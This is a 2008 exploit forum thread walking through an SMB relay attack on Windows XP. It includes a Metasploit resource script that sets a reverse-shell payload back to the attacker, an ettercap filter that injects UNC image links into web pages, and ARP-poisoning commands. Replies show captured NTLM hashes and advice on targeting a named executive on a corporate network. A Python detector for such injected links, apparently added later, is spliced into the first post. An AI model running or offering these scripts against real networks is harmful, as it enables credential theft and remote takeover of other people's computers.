Own Full patched XP box via HTTP - Remote Exploit Forums

03-22-2008, 02:58 AM
operat0r
Senior Member
 
Join Date: Nov 2006
Posts: 313
Own Full patched XP box via HTTP

update 7:27 PM 2/4/2009: http://www.tarasco.org/security/smbrelay/index.html




videos:

# with ettercap
http://s5.video.blip.tv/170000300628...console219.flv

# Thursday, 20 September 2007 ( not with ettercap )
http://www.learnsecurityonline.com/v...ay-reverse.swf




4:42 PM 4/25/2008:
Quote: "I tried it with 'Use simple file sharing' (recommended) checked... and the exploit WOULD NOT WORK."

Sadly (sometimes!?!?) this is checked by default, so I will look into some other things...
You also want to check out the Fast-Track mass client-side, which has GDI and QT exploits all in one, etc.! (This is part of fast-track.py; you must update it to current.)


Firefox by design will not load a 'local share'; this includes \\SMB\image.jpg shares
(if anybody has a non-JavaScript workaround please let me know; Flash also has the same security, or just gets passed to Firefox and then borks).

It may be possible to use this trick: 301-redirect the user to a local\share
http://forums.remote-exploit.org/programming/16014-replace-exe-msf-payload.html#post94904



What you need:
* ettercap
* ms framework3
* victim must have admin privs with no blank password and load an HTTP or HTTPS webpage.
* only works for MITM (LAN etc.)

** based on HD Moore's presentation at Defcon that used WPAD http://video.google.co.uk/videoplay?...56903673801959 'Tactical Exploitation'

Change the IP to your IP.


smb.rc
Code:
use exploit/windows/smb/smb_relay
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.90
set LPORT 21
exploit

smb.filter
Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("</body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>");
   replace("</Body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>");
   msg("Filter Ran.\n");
}
# etterfilter makes the smb.ef to use with ettercap

etterfilter smb.filter -o smb.ef
# run ettercap on target
ettercap -T -q -F smb.ef -M ARP // // -P autoadd

# start up msfconsole with the RC script
/pentest/exploits/framework3/msfconsole -r smb.rc


What happens?

ettercap replaces the IMG with \\yourip, so the victim tries to access your SMB_RELAY server for the IMG.
Then the attacker says NO, access denied! The victim says OK, let me try my login by default.


Quote: "Great job, but I got the well-known error message, which starts so:
"FAILED! The remote host has only provided us with Guest privileges....""

Read the error before that error; the guest error just means the auth failed.




Quote:
Originally Posted by www
5. On a Windows XP Pro computer, make sure that remote logons are not being coerced to the GUEST account (aka "ForceGuest", which is enabled by default on computers that are not attached to a domain). To do this, open the Local Security Policy editor (e.g. by typing 'secpol.msc' into the Run box, without quotes). Expand the "Local Policies" node and select "Security Options". Now scroll down to the setting titled "Network access: Sharing and security model for local accounts". If this is set to "Guest only", change it to "Classic" and restart your computer.

Last edited by operat0r; 02-04-2009 at 07:11 PM.
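As an added example (not from this thread or any of its posters), a defender-side check for the injection described in the first post: it scans an HTTP response body for fetch-triggering attributes that point at a UNC path (\\host\share, the form the filter injects for IE) or a file: URL (the form williamc reports Firefox rewriting it into), either of which makes a Windows client authenticate to the named host over SMB. The sample pages and the 192.0.2.10 address are constructed.

```python
import re
from html.parser import HTMLParser

# A page served over HTTP has no business referencing either of these:
#   \\host\share\file   -> client opens an SMB session to "host"
#   file:...            -> any file: URL; Firefox renders UNC as file:////host/share
UNC_RE = re.compile(r"^\\\\[^\\/]+[\\/]")
FILE_URL_RE = re.compile(r"^file:", re.IGNORECASE)

# Attributes the browser fetches automatically or on click.
FETCHING_ATTRS = {"src", "href", "data", "poster", "background"}


class SmbReferenceFinder(HTMLParser):
    """Collects (tag, attribute, value) for every SMB-share reference.
    html.parser unescapes attribute values, so an entity-encoded
    backslash (&#92;) is caught as well as a literal one."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in FETCHING_ATTRS and value:
                v = value.strip()
                if UNC_RE.match(v) or FILE_URL_RE.match(v):
                    self.hits.append((tag, name, v))


def find_smb_references(html_body):
    """Return all SMB-share references found in one HTTP response body."""
    finder = SmbReferenceFinder()
    finder.feed(html_body)
    finder.close()
    return finder.hits


# Constructed response bodies (not captured traffic).
CLEAN_PAGE = '<html><body><p>hi</p><img src="/static/logo.png"></body></html>'
INJECTED_PAGE = ('<html><body><p>hi</p>'
                 '<img src="\\\\192.0.2.10\\image.jpg"> </body></html>')
FIREFOX_STYLE_PAGE = ('<html><body>'
                      '<img src="file:////192.0.2.10/share/i.jpg"></body></html>')
ENTITY_PAGE = '<html><body><img src="&#92;&#92;192.0.2.10&#92;i.jpg"></body></html>'

if __name__ == "__main__":
    for label, page in [("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE),
                        ("firefox", FIREFOX_STYLE_PAGE), ("entity", ENTITY_PAGE)]:
        print(label, find_smb_references(page))
```

Run it over response bodies captured at a proxy or IDS; a hit on a page that should contain none indicates the body was altered between server and client, as the filter above does.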
 
03-26-2008, 11:19 PM
unix_r00ter
Member
 
Join Date: Feb 2007
Location: UK | Wales
Posts: 63

Does this only work on LAN?
 
03-26-2008, 11:23 PM
Deathray
Senior Member
 
Join Date: Oct 2007
Location: Vejle, Denmark
Posts: 380

Very interesting! I'm going to try it out right away.
I'll be back and tell you how it went.


Quote:
Originally Posted by unix_r00ter View Post
does this only work on LAN??
Read up on MITM (man in the middle) attacks.
 
03-26-2008, 11:44 PM
Deathray
Senior Member
 
Join Date: Oct 2007
Location: Vejle, Denmark
Posts: 380

Target: Windows XP SP0 no updates at all.
Ettercap
Code:
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Msfconsole
Code:
msf exploit(smb_relay) >

[*] Received 192.168.1.78:1057 \ LMHASH:00 NTHASH: OS:Windows 2002 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.1.78:1057 \
[*] Received 192.168.1.78:1057 VICTIMLOSER\Victimlooser 
LMHASH:93d1db444663b9c09378060fe4c2aead62db490241055c20 
NTHASH:c3156deb18c7a6e6d800c39c451abcfe39baaa133d72058a OS:Windows 2002 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.1.78 as VICTIMLOSER\Victimlooser...
[*] Failed to authenticate as VICTIMLOSER\Victimlooser...
And by the way, I think you should lookup the rules about links in signatures.
I'm not sure if plain-text links are allowed. Just trying to keep you out of trouble

Last edited by Deathray; 03-26-2008 at 11:58 PM.
 
03-27-2008, 01:24 AM
williamc
Senior Member
 
Join Date: May 2007
Posts: 277

Couple of questions:
Must file sharing be enabled on the victim as mentioned in the presentation?

Is this for IE only? I'm seeing IE using <img src="\\ip\share\i.jpg> while Firefox is mozicon-url:file:////ip/share/i.jpg
 
03-27-2008, 03:11 AM
operat0r
Senior Member
 
Join Date: Nov 2006
Posts: 313

Hmm, I'll try it with FF and add the code if it works. Thanks!
 
03-27-2008, 01:47 PM
Dr_GrEeN
Senior Member
 
Join Date: Sep 2007
Location: dark side of the moon
Posts: 682

Nice little audit. I wrote a tut similar to this last October; check it out.

http://forum.remote-exploit.org/show...?t=9121&page=2
__________________
yada yada
 
03-27-2008, 06:17 PM
williamc
Senior Member
 
Join Date: May 2007
Posts: 277

Can you clarify how this will affect a corporate network? Will all clients be routed through my client by default or can you limit it to those that type in your IP address in the web browser?
 
03-27-2008, 06:24 PM
operat0r
Senior Member
 
Join Date: Nov 2006
Posts: 313

Quote:
Originally Posted by williamc
Can you clarify how this will affect a corporate network?
Total ownage if they have admin rights (why? because nobody has a blank password in a corp LAN).

Quote:
Originally Posted by williamc
Will all clients be routed through my client by default or can you limit it to those that type in your IP address in the web browser?
You need to read how MITM works and also read up on how ettercap works, etc.
Simply make a target list instead of // //; use the target IP: /victomloser_CEO/ //
 
03-27-2008, 06:27 PM
operat0r
Senior Member
 
Join Date: Nov 2006
Posts: 313

Quote:
Originally Posted by Dr_GrEeN View Post
Nice little audit, I wrote a tut similar to this last October check it out.

http://forum.remote-exploit.org/show...?t=9121&page=2
Ya, nowadays I would use a more current sploit, say RTSP, etc.
http://rmccurdy.com/scripts/videos/q...3%20msfweb.swf
 
